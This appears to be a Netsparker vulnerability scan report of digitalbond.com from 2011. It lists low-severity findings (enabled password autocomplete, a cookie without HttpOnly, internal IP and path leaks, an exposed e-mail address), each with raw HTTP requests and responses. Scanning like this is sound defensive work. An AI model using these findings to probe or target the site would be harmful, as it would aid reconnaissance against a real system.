styleSheet.addRule(this.ns + '\\:*', '{behavior:url(#default#VML)}');
this.styleSheet = styleSheet;
} catch(err) {}
}
else {
this.styleSheet = style;
}
},

/**
* Method to use from afar - refer to it whenever.
* Example for IE only: DD_roundies.addRule('div.boxy_box', '10px 5px');
* Example for IE, Firefox, and WebKit: DD_roundies.addRule('div.boxy_box', '10px 5px', true);
* @param {String} selector - REQUIRED - a CSS selector, such as '#doc .container'
* @param {Integer} radius - REQUIRED - the desired radius for the box corners
* @param {Boolean} standards - OPTIONAL - true if you also wish to output -moz-border-radius/-webkit-border-radius/border-radius declarations
**/
addRule: function(selector, rad, standards) {
if (typeof rad == 'undefined' || rad === null) {
rad = 0;
}
if (rad.constructor.toString().search('Array') == -1) {
rad = rad.toString().replace(/[^0-9 ]/g, '').split(' ');
}
for (var i=0; i<4; i++) {
rad[i] = (!rad[i] && rad[i] !== 0) ? rad[Math.max((i-2), 0)] : rad[i];
}
if (this.styleSheet) {
if (this.styleSheet.addRule) { /* IE */
var selectors = selector.split(','); /* multiple selectors supported, no need for multiple calls to this anymore */
for (var i=0; i<selectors.length; i++) {
this.styleSheet.addRule(selectors[i], 'behavior:expression(DD_roundies.roundify.call(this, [' + rad.join(',') + ']))'); /* seems to execute the function without adding it to the stylesheet - interesting... */
}
}
else if (standards) {
var moz_implementation = rad.join('px ') + 'px';
this.styleSheet.appendChild(document.createTextNode(selector + ' {border-radius:' + moz_implementation + '; -moz-border-radius:' + moz_implementation + ';}'));
this.styleSheet.appendChild(document.createTextNode(selector + ' {-webkit-border-top-left-radius:' + rad[0] + 'px ' + rad[0] + 'px; -webkit-border-top-right-radius:' + rad[1] + 'px ' + rad[1] + 'px; -webkit-border-bottom-right-radius:' + rad[2] + 'px ' + rad[2] + 'px; -webkit-border-bottom-left-radius:' + rad[3] + 'px ' + rad[3] + 'px;}'));
}
}
else if (this.IE8) {
this.selectorsToProcess.push({'selector':selector, 'radii':rad});
}
},

readPropertyChanges: function(el) {
switch (event.propertyName) {
case 'style.border':
case 'style.borderWidth':
case 'style.padding':
this.applyVML(el);
break;
case 'style.borderColor':
this.vmlStrokeColor(el);
break;
case 'style.backgroundColor':
case 'style.backgroundPosition':
case 'style.backgroundRepeat':
this.applyVML(el);
break;
case 'style.display':
el.vmlBox.style.display = (el.style.display == 'none') ? 'none' : 'block';
break;
case 'style.filter':
this.vmlOpacity(el);
break;
case 'style.zIndex':
el.vmlBox.style.zIndex = el.style.zIndex;
break;
}
},

applyVML: function(el) {
el.runtimeStyle.cssText = '';
this.vmlFill(el);
this.vmlStrokeColor(el);
this.vmlStrokeWeight(el);
this.vmlOffsets(el);
this.vmlPath(el);
this.nixBorder(el);
this.vmlOpacity(el);
},

vmlOpacity: function(el) {
if (el.currentStyle.filter.search('lpha') != -1) {
var trans = el.currentStyle.filter;
trans = parseInt(trans.substring(trans.lastIndexOf('=')+1, trans.lastIndexOf(')')), 10)/100;
for (var v in el.vml) {
el.vml[v].filler.opacity = trans;
}
}
},

vmlFill: function(el) {
if (!el.currentStyle) {
return;
} else {
var elStyle = el.currentStyle;
}
el.runtimeStyle.backgroundColor = '';
el.runtimeStyle.backgroundImage = '';
var noColor = (elStyle.backgroundColor == 'transparent');
var noImg = true;
if (elStyle.backgroundImage != 'none' || el.isImg) {
if (!el.isImg) {
el.vmlBg = elStyle.backgroundImage;
el.vmlBg = el.vmlBg.substr(5, el.vmlBg.lastIndexOf('")')-5);
}
else {
el.vmlBg = el.src;
}
var lib = this;
if (!lib.imgSize[el.vmlBg]) { /* determine size of loaded image */
var img = document.createElement('img');
img.attachEvent('onload', function() {
this.width = this.offsetWidth; /* weird cache-busting requirement! */
this.height = this.offsetHeight;
lib.vmlOffsets(el);
});
img.className = lib.ns + '_sizeFinder';
img.runtimeStyle.cssText = 'behavior:none; position:absolute; top:-10000px; left:-10000px; border:none;'; /* make sure to set behavior to none to prevent accidental matching of the helper elements! */
img.src = el.vmlBg;
img.removeAttribute('width');
img.removeAttribute('height');
document.body.insertBefore(img, document.body.firstChild);
lib.imgSize[el.vmlBg] = img;
}
el.vml.image.filler.src = el.vmlBg;
noImg = false;
}
el.vml.image.filled = !noImg;
el.vml.image.fillcolor = 'none';
el.vml.color.filled = !noColor;
el.vml.color.fillcolor = elStyle.backgroundColor;
el.runtimeStyle.backgroundImage = 'none';
el.runtimeStyle.backgroundColor = 'transparent';
},

vmlStrokeColor: function(el) {
el.vml.stroke.fillcolor = el.currentStyle.borderColor;
},

vmlStrokeWeight: function(el) {
var borders = ['Top', 'Right', 'Bottom', 'Left'];
el.bW = {};
for (var b=0; b<4; b++) {
el.bW[borders[b]] = parseInt(el.currentStyle['border' + borders[b] + 'Width'], 10) || 0;
}
},

vmlOffsets: function(el) {
Internal Server Error

Internal Server Error

1 TOTAL
LOW
CONFIRMED
1
The server responded with an HTTP status 500, which indicates a server-side error. The causes vary, so the behaviour should be analysed carefully. If Netsparker is able to find a security issue in the same resource, it will report it as a separate vulnerability.

Impact

The impact varies depending on the cause. Generally this indicates poor coding practices: insufficient error checking, sanitization and whitelisting. However, there might be a bigger issue such as SQL Injection; if that is the case, Netsparker will check for other possible issues and report them separately.

Remedy

Analyse this issue and review the application code so that unexpected errors are handled. This should be a generic practice that does not disclose further information upon an error. All errors should be handled server-side only.
- /wp-content/themes/atahualpa/

/wp-content/themes/atahualpa/ CONFIRMED

https://www.digitalbond.com/wp-content/themes/atahualpa/

Request

GET /wp-content/themes/atahualpa/ HTTP/1.1
Referer: https://www.digitalbond.com/wp-content/themes/atahualpa/js/DD_roundies.js?ver=0.0.2a
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.digitalbond.com
Cookie: PHPSESSID=5c8a40ddb91f1a2acfe18880a9fdfdca; wordpress_test_cookie=WP+Cookie+check
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 500 Internal Server Error
Server: nginx/0.7.65
Date: Tue, 19 Apr 2011 19:55:55 GMT
Content-Type: text/html
Connection: keep-alive
Keep-Alive: timeout=10
Cache-Control: max-age=7200
Expires: Tue, 19 Apr 2011 21:55:55 GMT
Vary: User-Agent,Accept-Encoding
Content-Encoding:
Content-Length: 20


Auto Complete Enabled

Auto Complete Enabled

1 TOTAL
LOW
CONFIRMED
1
"Auto Complete" was enabled in one or more of the form fields. These were either "password" fields or important fields such as "Credit Card".

Impact

Data entered in these fields will be cached by the browser. An attacker who can access the victim's browser could steal this information. This is especially important if the application is commonly used in shared computers such as cyber cafes or airport terminals.

Remedy

Add the attribute autocomplete="off" to the form tag or to individual "input" fields.

Actions to Take

  1. See the remedy for the solution.
  2. Find all instances of inputs which store private data and disable autocomplete. Fields which contain data such as "Credit Card" or "CCV" type data should not be cached. You can allow the application to cache usernames and remember passwords; however, in most cases this is not recommended.
  3. Re-scan the application after addressing the identified issues to ensure that all of the fixes have been applied properly.

Required Skills for Successful Exploitation

Dumping all data from a browser can be fairly easy, and a number of automated tools exist to do this. Where the attacker cannot dump the data, he/she could still browse the recently visited websites and activate the auto-complete feature to see previously entered values.

External References

- /wp-login.php

/wp-login.php CONFIRMED

https://www.digitalbond.com/wp-login.php?action=register

Identified Field Name

cimy_uef_wp_PASSWORD

Request

GET /wp-login.php?action=register HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.digitalbond.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Tue, 19 Apr 2011 19:55:55 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Keep-Alive: timeout=10
Set-Cookie: PHPSESSID=5c8a40ddb91f1a2acfe18880a9fdfdca; path=/,wordpress_test_cookie=WP+Cookie+check; path=/,wordpress_test_cookie=WP+Cookie+check; path=/
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Tue, 19 Apr 2011 19:55:55 GMT
Vary: User-Agent,Accept-Encoding
Content-Encoding:
Content-Length: 2361
X-Type: backend


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US"><head> <title>Digital Bond&#039;s SCADA Security Portal &rsaquo; Registration Form</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><link rel='stylesheet' id='login-css' href='https://www.digitalbond.com/wp-admin/css/login.css?ver=20110121' type='text/css' media='all' /><link rel='stylesheet' id='colors-fresh-css' href='https://www.digitalbond.com/wp-admin/css/colors-fresh.css?ver=20110121' type='text/css' media='all' /><script type='text/javascript' src='https://www.digitalbond.com/wp-includes/js/l10n.js?ver=20101110'></script><script type='text/javascript' src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js"></script><script type='text/javascript' src='https://www.digitalbond.com/wp-content/themes/atahualpa/js/DD_roundies.js?ver=0.0.2a'></script><link rel='stylesheet' id='cimy_uef_register-css' href='https://www.digitalbond.com/wp-content/plugins/cimy-user-extra-fields/css/cimy_uef_register.css?ver=3.1.1' type='text/css' media='all' /> <style type="text/css">
#login h1 a {
background: url(http://www.digitalbond.com/wp-content/Cimy_User_Extra_Fields/digitalbond_logo_final_328.png) no-repeat top center;
background-position: center top;
width: 328px;
height: 165px;
text-indent: -9999px;
overflow: hidden;
padding-bottom: 15px;
display: block;
}
</style>
<meta name='robots' content='noindex,nofollow' /></head><body class="login"><div id="login"><h1><a href="http://wordpress.org/" title="Powered by WordPress">Digital Bond&#039;s SCADA Security Portal</a></h1><p class="message register">Register For This Site</p><form name="registerform" id="registerform" action="https://www.digitalbond.com/wp-login.php?action=register" method="post"> <p> <label>Username<br /> <input type="text" name="user_login" id="user_login" class="input" value="" size="20" tabindex="10" /></label> </p> <p> <label>E-mail<br /> <input type="text" name="user_email" id="user_email" class="input" value="" size="25" tabindex="20" /></label> </p><!-- Start code from Cimy User Extra Fields 2.0.3 Copyright (c) 2006-2011 Marco Cimmino http://www.marcocimmino.net/cimy-wordpress-plugins/cimy-user-extra-fields/--> <input type="hidden" name="cimy_post" value="1" /> <p id="cimy_uef_wp_p_field_1"> <label for="cimy_uef_wp_1">First name</label><input type="text" name="cimy_uef_wp_FIRSTNAME" id="cimy_uef_wp_1" class="cimy_uef_input_27" value="" maxlength="20" tabindex="21" /> </p> <p id="cimy_uef_wp_p_field_2"> <label for="cimy_uef_wp_2">Last name</label><input type="text" name="cimy_uef_wp_LASTNAME" id="cimy_uef_wp_2" class="cimy_uef_input_27" value="" maxlength="25" tabindex="22" /> </p> <p id="cimy_uef_wp_p_field_3"> <label for="cimy_uef_wp_3">Password</label><input type="password" name="cimy_uef_wp_PASSWORD" id="cimy_uef_wp_3" class="cimy_uef_input_27" value="" maxlength="16" tabindex="23" /> </p> <p id="cimy_uef_wp_p_field_4"> <label for="cimy_uef_wp_4">Password confirmation</label><input type="password" name="cimy_uef_wp_PASSWORD2" id="cimy_uef_wp_4" class="cimy_uef_input_27" value="" maxlength="16" tabindex="24" /> </p> <h2>Password_Tips</h2> <p id="cimy_uef_p_desc_7" class="desc"><br />Use your weak password on this site. Do not use one of your strong, important passwords because it will be sent in an email.

Registration is free of charge and you will not purchase anything with this account. </p> <p id="cimy_uef_p_field_7"> <input type="checkbox" name="cimy_uef_TIP" id="cimy_uef_7" class="cimy_uef_checkbox" value="1" tabindex="25" /><label class="cimy_uef_label_checkbox" for="cimy_uef_7"> </label><br /> </p> <p id="cimy_uef_p_field_1"> <label for="cimy_uef_1">Enter your company's name</label><input type="text" name="cimy_uef_COMPANY" id="cimy_uef_1" class="cimy_uef_input_27" value="" maxlength="63" tabindex="26" /> </p> <p id="cimy_uef_p_field_5"> <label for="cimy_uef_5">Enter your industry sector</label><input type="text" name="cimy_uef_SECTOR" id="cimy_uef_5" class="cimy_uef_input_27" value="" maxlength="63" tabindex="27" /> </p> <p id="cimy_uef_p_field_6"> <label for="cimy_uef_6">What country are you in?</label><input type="text" name="cimy_uef_COUNTRY" id="cimy_uef_6" class="cimy_uef_input_27" value="" maxlength="25" tabindex="28" /> </p> <div style="width: 278px; float: left; height: 80px; vertical-align: text-top;"> <img id="captcha" align="left" style="padding-right: 5px; border: 0" src="https://www.digitalbond.com/wp-content/plugins/cimy-user-extra-fields/securimage/securimage_show_captcha.php" alt="CAPTCHA Image" /> <object type="application/x-shockwave-flash" data="https://www.digitalbond.com/wp-content/plugins/cimy-user-extra-fields/securimage/securimage_play.swf?audio=https://www.digitalbond.com/wp-content/plugins/cimy-user-extra-fields/securimage/securimage_play.php&#038;bgColor1=#fff&#038;bgColor2=#fff&#038;iconColor=#777&#038;borderWidth=1&#038;borderColor=#000" height="19" width="19"><param name="movie" value="https://www.digitalbond.com/wp-content/plugins/cimy-user-extra-fields/securimage/securimage_play.swf?audio=https://www.digitalbond.com/wp-content/plugins/cimy-user-extra-fields/securimage/securimage_play.php&#038;bgColor1=#fff&#038;bgColor2=#fff&#038;iconColor=#777&#038;borderWidth=1&#038;borderColor=#000" /></object> <br /><br /><br /><br /> <a 
align="right" tabindex="29" style="border-style: none" href="#" onclick="document.getElementById('captcha').src = 'https://www.digitalbond.com/wp-content/plugins/cimy-user-extra-fields/securimage/securimage_show_captcha.php?' + Math.random(); return false"><img src="https://www.digitalbond.com/wp-content/plugins/cimy-user-extra-fields/securimage/images/refresh.gif" alt="Change image" border="0" onclick="this.blur()" align="bottom" /></a> </div> <div style="width: 278px; float: left; height: 50px; vertical-align: bottom; padding: 5px;"> Insert the code:&nbsp;<input type="text" name="securimage_response_field" size="10" maxlength="6" tabindex="30" /> </div><!-- End of code from Cimy User Extra Fields--> <p id="reg_passmail">A password will be e-mailed to you.</p> <br class="clear" /> <input type="hidden" name="redirect_to" value="" /> <p class="submit"><input type="submit" name="wp-submit" id="wp-submit" class="button-primary" value="Register" tabindex="100" /></p></form><p id="nav"><a href="https://www.digitalbond.com/wp-login.php">Log in</a> |<a href="https://www.digitalbond.com/wp-login.php?action=lostpassword" title="Password Lost and Found">Lost your password?</a></p></div><script type="text/javascript">try{document.getElementById('user_login').focus();}catch(e){}if(typeof wpOnload=='function')wpOnload();</script><p id="backtoblog"><a href="https://www.digitalbond.com/" title="Are you lost?">&larr; Back to Digital Bond&#039;s SCADA Security Portal</a></p></body></html>
Cookie Not Marked As HttpOnly

Cookie Not Marked As HttpOnly

1 TOTAL
LOW
CONFIRMED
1
The cookie was not marked as HTTPOnly. HTTPOnly cookies cannot be read by client-side scripts; therefore, marking a cookie as HTTPOnly can provide an additional layer of protection against Cross-site Scripting attacks.

Impact

During a Cross-site Scripting attack an attacker might easily access cookies and hijack the victim's session.

Actions to Take

  1. See the remedy for the solution.
  2. Consider marking all of the cookies used by the application as HTTPOnly (after this change, JavaScript code will not be able to read the cookies).

Remedy

Mark the cookie as HTTPOnly. This will be an extra layer of defence against XSS. However, this is not a silver bullet and will not protect the system against Cross-site Scripting attacks: an attacker can use a tool such as XSS Tunnel to bypass HTTPOnly protection.

External References

- /wp-login.php

/wp-login.php CONFIRMED

https://www.digitalbond.com/wp-login.php?action=register

Identified Cookie

PHPSESSID

Request

GET /wp-login.php?action=register HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.digitalbond.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Tue, 19 Apr 2011 19:55:55 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Keep-Alive: timeout=10
Set-Cookie: PHPSESSID=5c8a40ddb91f1a2acfe18880a9fdfdca; path=/,wordpress_test_cookie=WP+Cookie+check; path=/,wordpress_test_cookie=WP+Cookie+check; path=/
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Tue, 19 Apr 2011 19:55:55 GMT
Vary: User-Agent,Accept-Encoding
Content-Encoding:
Content-Length: 2361
X-Type: backend


[Possible] Internal IP Address Leakage

[Possible] Internal IP Address Leakage

1 TOTAL
LOW
Netsparker discovered an internal IP address in the page. It was not determined whether the IP address was that of the system itself or that of an internal network.

Impact

This kind of information can be useful for an attacker when combined with other vulnerabilities.

Remedy

First ensure that this is not a false positive. Due to the nature of the issue, Netsparker could not confirm that this IP address is actually the real internal IP address of the target web server or internal network. If it is, consider removing it.
- /2010/12/

/2010/12/

http://www.digitalbond.com/2010/12/

Extracted IP Address(es)

192.168.10.10

Request

GET /2010/12/ HTTP/1.1
Referer: http://www.digitalbond.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.digitalbond.com
Cookie: PHPSESSID=5c8a40ddb91f1a2acfe18880a9fdfdca; wordpress_test_cookie=WP+Cookie+check
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Tue, 19 Apr 2011 19:57:39 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Keep-Alive: timeout=10
Expires: Tue, 19 Apr 2011 21:57:39 GMT
Cache-Control: max-age=7200, public, must-revalidate, proxy-revalidate
Pragma: public
Set-Cookie: wordpress_test_cookie=WP+Cookie+check; path=/
X-Pingback: http://www.digitalbond.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Last-Modified: Tue, 19 Apr 2011 19:57:39 GMT
Vary: Accept-Encoding,Cookie,User-Agent
Etag: 9a14bd71431fb0a62576e097ff9a9f72
Content-Encoding:
X-Type: default


menu-item-type-custom menu-item-object-custom menu-item-8657"><a><span>What&#8217;s Hot:</span></a></li><li id="menu-item-8653" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-8653"><a href="http://www.digitalbond.com/tools/bandolier/"><span>Bandolier</span></a></li><li id="menu-item-8654" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-8654"><a href="http://www.digitalbond.com/tools/portaledge/"><span>Portaledge</span></a></li><li id="menu-item-8655" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-8655"><a href="http://www.digitalbond.com/tools/quickdraw/"><span>Quickdraw SCADA IDS</span></a></li><li id="menu-item-9624" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-9624"><a href="http://www.digitalbond.com/category/vulnerabilities/vulnerability-disclosure-vulnerabilities/"><span>Vulnerability Disclosure</span></a></li></ul></div>

</td>
<!-- / Header -->

</tr>

<!-- Main Body -->
<tr id="bodyrow">




<!-- Main Column -->
<td id="middle">





<div class="post-8304 post type-post status-publish format-standard hentry category-1 odd" id="post-8304">


<div class="post-headline"> <h2> <a href="http://www.digitalbond.com/2010/12/31/holiday-news-and-notes/" rel="bookmark" title="Permanent Link to Holiday News and Notes">Holiday News and Notes</a></h2>
</div>
<div class="post-byline">Dale Peterson</div>
<div class="post-bodycopy clearfix"><p>Happy New Year to all our loyal blog readers.</p><ul><li>Rep. Dan Lungren (California), will be the next chairman of the Subcommittee on Cybersecurity, Infrastructure Protection, and Security Technologies (Formerly &#8211; Subcommittee on Emerging Threats, Cybersecurity, and Science and Technology). He will be a major player on ICS security legislation in the next two years.</li></ul><ul><li>Tripwire has a <a href="http://www.tripwire.com/_landing/energy-compliance/">useful video interview series</a> with Patrick Miller of EnergySec. It covers NERC CIP, smart grid and Stuxnet. Skip part 1 and maybe part 4.</li></ul><ul><li>Trying to understand the <a href="http://www.nerc.com/filez/enforcement/index.html">December NERC fines</a>. Many are non-CIP, which is to be expected, but the majority of the CIP violations are related to CIP-004-1? We will dig into this in the new year.</li></ul><ul><li>The <a href="http://www.securityincidents.org/membership.asp">Repository of Industrial Security Incidents [RISI]</a> has a sale on membership now. It still seems a bit pricey for the info, but it is the best publicly available set of info on the market.</li></ul><ul><li><a href="http://www.frost.com/prod/servlet/press-release.pag?Src=RSS&amp;docid=218949720">Frost &amp; Sullivan estimates the World SCADA Market</a> at $4,584.5 million in 2009 and estimates this to reach $6,902.4 million in 2016. Growth rate isn&#8217;t great, but at least it is positive for those making their livings in ICS.</li></ul><ul><li><a href="http://www.dhs.gov/ynews/releases/pr_1292971482908.shtm">DHS Secretary Napolitano highlights DHS&#8217;s major accomplishments in the past year</a>. There is a paragraph on &#8220;safeguard and secure cyberspace&#8221;. Stop, Think, Connect awareness program is a major accomplishment? Cyberstorm III? 
If you ever get the chance buy a Cyberstorm participant a drink and ask them privately <a href=http://www.digitalbond.com/2010/12/31/holiday-news-and-notes/> Read More </a></p></div>

<div class="post-footer">31 December 2010 | <a href="http://www.digitalbond.com/2010/12/31/holiday-news-and-notes/#respond" class="comments-link" title="Comment on Holiday News and Notes">Leave a comment</a></div>

</div><!-- / Post -->


<div class="post-8289 post type-post status-publish format-standard hentry category-stuxnet even" id="post-8289">


<div class="post-headline"> <h2> <a href="http://www.digitalbond.com/2010/12/22/will-stuxnet-become-our-christmas-day-bomber/" rel="bookmark" title="Permanent Link to Will Stuxnet become our Christmas day bomber?">Will Stuxnet become our Christmas day bomber?</a></h2>
</div>
<div class="post-byline"> </div>
<div class="post-bodycopy clearfix"><p>Are we asking the right questions about the threats to control systems for 2011? A couple of things I&#8217;ve read today have me wondering about this.</p><p>First, I followed Bruce Schneier&#8217;s link to <a href="http://emergentchaos.com/archives/2010/12/the-tsas-approach-to-threat-modeling.html" mce_href="http://emergentchaos.com/archives/2010/12/the-tsas-approach-to-threat-modeling.html"--></p><p>Are we asking the right questions about the threats to control systems for 2011? A couple of things I’ve read today have me wondering about this.</p><p>First, I followed Bruce Schneier’s link to <a href="http://emergentchaos.com/archives/2010/12/the-tsas-approach-to-threat-modeling.html">this commentary</a> which talks about terror threat modeling from a software threat modeling point of view, specifically as it relates to some comments from President Obama regarding the TSA and a reference to the 2009 Christmas day bombing attempt. It&#8217;s somewhat tangental to control systems but the points are very applicable. Here&#8217;s one snippet:</p><blockquote><p>Half of getting the right answer is asking the right questions. If the question the President is hearing is “what can we do to protect against the threat that we saw in the Christmas day bombing (attempt)” then there are three possible interpretations. First is that the right question is being asked at a technical level, and the wrong question is being asked at the top. Second, the wrong questions are being asked up and down the line. 
Third is that the wrong question is being asked at the top, but it’s the right question for a TSA Administrator who wants to be able to testify before Congress that “everything possible was done.”</p></blockquote><p>The other thing I read this morning was Ralph Langner&#8217;s latest comment on <a href="http://www.digitalbond.com/index.php/2010/12/17/friday-news-and-notes-122/#comments">last week&#8217;s <a href=http://www.digitalbond.com/2010/12/22/will-stuxnet-become-our-christmas-day-bomber/> Read More </a></p></div>

<div class="post-footer">22 December 2010 | <a href="http://www.digitalbond.com/2010/12/22/will-stuxnet-become-our-christmas-day-bomber/#comments" class="comments-link" title="Comment on Will Stuxnet become our Christmas day bomber?">One comment</a></div>
<ul class="oio-banner-zone" id="oio-banner-2" style="width:610px; height:250px; margin:0 auto;"><li style="width:300px; height:250px; line-height:250px; margin:0 10px 0 0;"><a rel="nofollow" target="_blank" href="http://www.digitalbond.com/wp-content/plugins/oiopub-direct/modules/tracker/go.php?id=7" title="Critical Intelligence"><img src="http://digibond.wpengine.netdna-cdn.com/wp-content/plugins/oiopub-direct/uploads/ioEI4N_StayUptoDate2.jpg" alt="Critical Intelligence" style="width:300px; height:250px; border:0px;" /></a></li><li style="width:300px; height:250px; line-height:250px; margin:0 0 0 0;"><a rel="nofollow" target="_blank" href="http://www.digitalbond.com/wp-content/plugins/oiopub-direct/modules/tracker/go.php?id=9" title=""><img src="http://digibond.wpengine.netdna-cdn.com/wp-content/plugins/oiopub-direct/uploads/tcsHnU_SEL_DigiBond_SecPosters_300x250.gif" alt="" style="width:300px; height:250px; border:0px;" /></a></li></ul>
</div><!-- / Post -->


<div class="post-8282 post type-post status-publish format-standard hentry category-1 odd" id="post-8282">


<div class="post-headline"> <h2> <a href="http://www.digitalbond.com/2010/12/17/friday-news-and-notes-122/" rel="bookmark" title="Permanent Link to Friday News and Notes">Friday News and Notes</a></h2>
</div>
<div class="post-byline">Dale Peterson</div>
<div class="post-bodycopy clearfix"><p>We can’t complain about too much Stuxnet after a one hour podcast with Ralph Langner, but there was a lot of news, analysis and speculation.<p>Gartner Group has a Lessons Learned From Stuxnet document available for purchase. Andrew Ginter read it and had <a href="http://controlsystemsecurity.blogspot.com/2010/12/gartner-security-lessons-learned-from.html">an interesting review</a>.</p><ul><li>The <a href="http://www.jpost.com/IranianThreat/News/Article.aspx?id=199475">Jerusalem Post quotes Ralph Langner</a> as saying Stuxnet set the Iranian nuclear weapons program back two years.</li></ul><ul><li><a href="http://blogs.forbes.com/firewall/2010/12/14/stuxnets-finnish-chinese-connection/">Jeffrey Carr thinks that China is the most likely culprit behind Stuxnet</a>. Hmmm, seems odd but who knows? They get blamed for everything cyber so let&#8217;..
Forbidden Resource

1 TOTAL
INFORMATION
CONFIRMED
1
Access to this resource has been denied by the web server. This is generally not a security issue, and is reported here for information purposes.

Impact

There is no impact resulting from this issue.
- /wp-admin/css/

/wp-admin/css/ CONFIRMED

https://www.digitalbond.com/wp-admin/css/

Request

GET /wp-admin/css/ HTTP/1.1
Referer: https://www.digitalbond.com/wp-admin/css/login.css?ver=20110121
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.digitalbond.com
Cookie: PHPSESSID=5c8a40ddb91f1a2acfe18880a9fdfdca; wordpress_test_cookie=WP+Cookie+check
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 403 Forbidden
Server: nginx/0.7.65
Date: Tue, 19 Apr 2011 19:55:55 GMT
Content-Type: text/html; charset=iso-8859-1
Connection: keep-alive
Keep-Alive: timeout=10
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 184


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access /wp-admin/css/on this server.</p></body></html>
E-mail Address Disclosure

1 TOTAL
INFORMATION
Netsparker found e-mail addresses on the web site.

Impact

E-mail addresses discovered within the application can be harvested by spam engines and used as account names by brute-force tools. Furthermore, valid e-mail addresses may lead to social engineering attacks.

Remedy

Use generic e-mail addresses such as contact@ or info@ for general communications and remove user-specific e-mail addresses from the web site; where contact with specific people is required, use submission forms for this purpose.

- /wp-content/themes/atahualpa/js/DD_roundies.js

/wp-content/themes/atahualpa/js/DD_roundies.js

https://www.digitalbond.com/wp-content/themes/atahualpa/js/DD_roundies.js?ver=0.0.2a

Found E-mails

drew.diller@gmail.com

Request

GET /wp-content/themes/atahualpa/js/DD_roundies.js?ver=0.0.2a HTTP/1.1
Referer: https://www.digitalbond.com/wp-login.php?action=register
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.digitalbond.com
Cookie: PHPSESSID=5c8a40ddb91f1a2acfe18880a9fdfdca; wordpress_test_cookie=WP+Cookie+check
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Tue, 19 Apr 2011 19:55:55 GMT
Content-Type: application/x-javascript
Transfer-Encoding: chunked
Connection: keep-alive
Keep-Alive: timeout=10
Last-Modified: Fri, 14 Jan 2011 21:06:20 GMT
Expires: Wed, 20 Apr 2011 19:55:55 GMT
Cache-Control: max-age=86400
X-Type: static/local
Content-Encoding:


/**
* DD_roundies, this adds rounded-corner CSS in standard browsers and VML sublayers in IE that accomplish a similar appearance when comparing said browsers.
* Author: Drew Diller
* Email: drew.diller@gmail.com
* URL: http://www.dillerdesign.com/experiment/DD_roundies/
* Version: 0.0.2a
* Licensed under the MIT License: http://dillerdesign.com/experiment/DD_roundies/#license
*
* Usage:
* DD_roundies.addRule('#doc .container', '10px 5px'); // selector and multiple radii
* DD_roundies.addRule('.box', 5, true); // selector, radius, and optional addition of border-radius code for standard browsers.
*
* Just want the PNG fixing effect for IE6, and don't want to also use the DD_belatedPNG library? Don't give any additional arguments after the CSS selector.
* DD_roundies.addRule('.your .example img');
**/

[Possible] Internal Path Leakage (*nix)

1 TOTAL
INFORMATION
Netsparker identified an internal path in the document.

Impact

There is no direct impact; however, this information can help an attacker during the exploitation of other vulnerabilities.

- /tools/portaledge/portaledge-sem-integration/

/tools/portaledge/portaledge-sem-integration/

http://www.digitalbond.com/tools/portaledge/portaledge-sem-integration/

Identified Internal Path(s)

/opt/lce/daemons/plugins

Request

GET /tools/portaledge/portaledge-sem-integration/ HTTP/1.1
Referer: http://www.digitalbond.com/tools/portaledge/nerc-cip-5-monitoring-modules/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.digitalbond.com
Cookie: PHPSESSID=5c8a40ddb91f1a2acfe18880a9fdfdca; wordpress_test_cookie=WP+Cookie+check
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Tue, 19 Apr 2011 20:00:18 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Keep-Alive: timeout=10
Expires: Tue, 19 Apr 2011 22:00:18 GMT
Cache-Control: max-age=7200, public, must-revalidate, proxy-revalidate
Pragma: public
Set-Cookie: wordpress_test_cookie=WP+Cookie+check; path=/
